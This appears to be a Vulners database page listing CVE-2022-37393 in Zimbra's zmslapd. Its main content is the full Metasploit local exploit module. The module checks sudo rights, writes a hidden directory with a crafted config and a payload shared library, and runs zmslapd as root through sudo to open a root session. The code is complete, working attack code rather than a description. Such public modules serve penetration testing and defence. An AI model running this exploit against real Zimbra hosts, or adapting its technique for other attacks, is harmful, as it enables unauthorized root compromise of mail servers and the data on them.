Lucene search
K

Zimbra zmslapd arbitrary module load

🗓️ 29 Aug 2022 18:02:23Reported by Darren Martyn, Ron BowesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 216 Views

Zimbra zmslapd arbitrary module load CVE-2022-3739

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Zimbra zmslapd Privilege Escalation Exploit
10 Aug 202200:00
zdt
ATTACKERKB
CVE-2022-27925
21 Apr 202200:00
attackerkb
ATTACKERKB
CVE-2022-37393
16 Aug 202220:15
attackerkb
ATTACKERKB
CVE-2022-41352
26 Sep 202200:00
attackerkb
ATTACKERKB
CVE-2024-45519
2 Oct 202400:00
attackerkb
BDU FSTEC
The vulnerability of the zmslapd function in the Zimbra Collaboration Suite’s email management system allows a hacker to execute arbitrary code.
24 Aug 202200:00
bdu_fstec
Circl
CVE-2022-37393
9 Aug 202216:39
circl
CNNVD
Zimbra 安全漏洞
10 Aug 202200:00
cnnvd
CVE
CVE-2022-37393
16 Aug 202220:00
cve
Cvelist
CVE-2022-37393 Zimbra zmslapd arbitrary module load
16 Aug 202220:00
cvelist
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zimbra zmslapd arbitrary module load',
        'Description' => %q{
          This module exploits CVE-2022-37393, which is a vulnerability in
          Zimbra's sudo configuration that permits the zimbra user to execute
          the zmslapd binary as root with arbitrary parameters. As part of its
          intended functionality, zmslapd can load a user-defined configuration
          file, which includes plugins in the form of .so files, which also
          execute as root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Darren Martyn', # discovery and poc
          'Ron Bowes',     # Module
        ],
        'DisclosureDate' => '2021-10-27',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2022-37393' ],
          [ 'URL', 'https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
        ],
        'Targets' => [
          [ 'Auto', {} ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
    register_options [
      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),
      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
    ]
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Because this isn't patched, I can't say with 100% certainty that this will
  # detect a future patch (it depends on how they patch it)
  def check
    # Sanity check
    if is_root?
      fail_with(Failure::None, 'Session already has root privileges')
    end

    unless file_exist?("#{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
      print_error("zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")
      return CheckCode::Safe('zmslapd executable not detected')
    end

    unless command_exists?(datastore['SUDO_PATH'])
      print_error("Could not find sudo: #{datastore['SUDO_PATH']} (set SUDO_PATH if sudo isn't in $PATH)")
      return CheckCode::Safe('sudo not found')
    end

    # Run `sudo -n -l` to make sure we have access to the target command
    cmd = "#{datastore['SUDO_PATH']} -n -l"
    print_status "Executing: #{cmd}"
    output = cmd_exec(cmd).to_s

    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
      print_error('Current user could not execute sudo -l')
      return CheckCode::Safe('Current user could not execute sudo')
    end

    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
      print_error('Current user does not have access to run zmslapd')
      return CheckCode::Safe('Current user does not have access to run zmslapd')
    end

    CheckCode::Appears('Target appears to be vulnerable')
  end

  def exploit
    base_dir = datastore['WritableDir'].to_s
    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # Generate a random directory
    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    if file_exist?(exploit_dir)
      fail_with(Failure::BadConfig, 'Exploit dir already exists')
    end

    # Create the directory and get ready to remove it
    print_status("Creating exploit directory: #{exploit_dir}")
    mkdir(exploit_dir)
    register_dir_for_cleanup(exploit_dir)

    # Generate some filenames
    library_name = ".#{rand_text_alphanumeric(5..10)}.so"
    library_path = "#{exploit_dir}/#{library_name}"
    config_name = ".#{rand_text_alphanumeric(5..10)}"
    config_path = "#{exploit_dir}/#{config_name}"

    # Create the .conf file
    config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"
    write_file(config_path, config)

    write_file(library_path, generate_payload_dll)

    cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
    print_status "Attempting to trigger payload: #{cmd}"
    out = cmd_exec(cmd)

    unless session_created?
      print_error("Failed to create session! Cmd output = #{out}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2026 19:00Current
8.5High risk
Vulners AI Score8.5
CVSS 3.17.8
EPSS0.01683
216